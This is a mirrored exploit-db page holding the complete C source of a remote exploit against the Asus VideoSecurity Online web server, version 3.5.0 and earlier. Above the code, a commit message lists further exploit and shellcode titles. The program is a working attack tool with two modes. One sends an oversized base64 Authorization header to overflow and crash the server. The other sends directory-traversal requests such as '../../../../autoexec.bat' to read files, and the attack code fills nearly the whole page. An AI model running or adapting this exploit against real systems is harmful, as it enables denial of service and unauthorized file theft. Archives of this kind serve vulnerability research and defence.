bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/26460.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

203 lines
No EOL
6.5 KiB
C
Raw Blame History

/*
source: https://www.securityfocus.com/bid/15279/info
Asus VideoSecurity Online is prone to a buffer overflow in the authentication mechanism of the included Web server. This issue only exists if authentication is enabled on the Web server.
The Web server included with Asus VideoSecurity Online is not enabled by default.
This vulnerability is reported to affect Asus VideoSecurity Online 3.5.0 and earlier.
*/
/* by Luigi Auriemma */ #include <stdio.h> #include <stdlib.h> #include
<string.h> #ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define ONESEC 1000 #else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1 #endif #define VER "0.1" #define PORT 80 #define
BUFFSZ 8192 #define BOFSZ 2700 u_char *delimit(u_char *data); int
http_get(u_char *in, int insz, u_char *out, int outsz); u_char
*base64_encode(u_char *data, int *length); u_int resolv(char *host); void
std_err(void); struct sockaddr_in peer; int main(int argc, char *argv[]) {
int len,
attack,
auth = 0;
u_short port = PORT;
u_char buff[BUFFSZ],
uri[BUFFSZ >> 1],
more[BUFFSZ >> 1],
userpass[64],
*b64,
*p; #ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata); #endif
setbuf(stdout, NULL);
fputs("\n"
"ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities
"VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attack:\n"
"1 = authorization buffer-overflow, works only if server uses
password\n"
"2 = directory traversal, if the server uses a password you
must know it\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
len = sprintf(buff,
"GET / HTTP/1.1\r\n"
"Connection: close\r\n"
"\r\n");
fputs("- check server\n", stdout);
len = http_get(buff, len, buff, sizeof(buff) - 1);
p = strstr(buff, "\r\n\r\n");
if(p) *p = 0;
if(strstr(buff, "Authenticate")) {
auth = 1;
fputs("- server uses password\n", stdout);
}
*uri = 0;
*more = 0;
switch(attack) {
case 1: {
if(!auth) {
printf(" Alert: the server doesn't use password so is not
vulnerable to this attack\n");
}
memset(buff, 'A', BOFSZ);
len = BOFSZ;
b64 = base64_encode(buff, &len);
sprintf(more, "Authorization: Basic %s\r\n", b64);
free(b64);
} break;
case 2: {
if(auth) {
fputs("- insert username:password (like asus:asus):\n ",
stdout);
fflush(stdin);
fgets(userpass, sizeof(userpass), stdin);
len = delimit(userpass) - userpass;
b64 = base64_encode(userpass, &len);
sprintf(more, "Authorization: Basic %s\r\n", b64);
free(b64);
}
fputs("- insert the URI (like ../../../../autoexec.bat):\n ",
stdout);
fflush(stdin);
fgets(uri, sizeof(uri), stdin);
delimit(uri);
} break;
default: {
printf("\nError: the attack %d is not available\n\n", attack);
exit(1);
} break;
}
sleep(ONESEC);
len = sprintf(buff,
"GET /%s HTTP/1.1\r\n"
"Connection: close\r\n"
"%s"
"\r\n",
uri,
more);
fputs("- launch attack\n", stdout);
len = http_get(buff, len, buff, sizeof(buff) - 1);
if(len < 0) {
fputs("- the server seems crashed\n\n", stdout);
} else {
fputs("- show the returned data:\n", stdout);
fputs(buff, stdout);
}
return(0); } u_char *delimit(u_char *data) {
while(*data > '\r') data++;
*data = 0;
return(data); } int http_get(u_char *in, int insz, u_char *out, int
outsz) {
int sd,
t,
len = 0;
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(send(sd, in, insz, 0)
< 0) std_err();
while(outsz) {
t = recv(sd, out, outsz, 0);
if(t < 0) {
len = -1;
break;
}
if(!t) break;
len += t;
out += t;
outsz -= t;
}
*out = 0;
close(sd);
return(len); } u_char *base64_encode(u_char *data, int *length) {
int r64len,
len = *length;
u_char *p64;
static u_char *r64;
const static char enctab[64] = {
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
};
r64len = ((len / 3) << 2) + 5;
r64 = malloc(r64len);
if(!r64) return(NULL);
p64 = r64;
do {
*p64++ = enctab[(*data >> 2) & 63];
*p64++ = enctab[(((*data & 3) << 4) | ((*(data + 1) >> 4) & 15)) &
63];
data++;
*p64++ = enctab[(((*data & 15) << 2) | ((*(data + 1) >> 6) & 3)) &
63];
data++;
*p64++ = enctab[*data & 63];
data++;
len -= 3;
} while(len > 0);
for(; len < 0; len++) *(p64 + len) = '=';
*p64 = 0;
*length = p64 - r64;
return(r64); } u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)(hp->h_addr);
}
return(host_ip); } #ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
} #endif
Reference in a new issue View git blame Copy permalink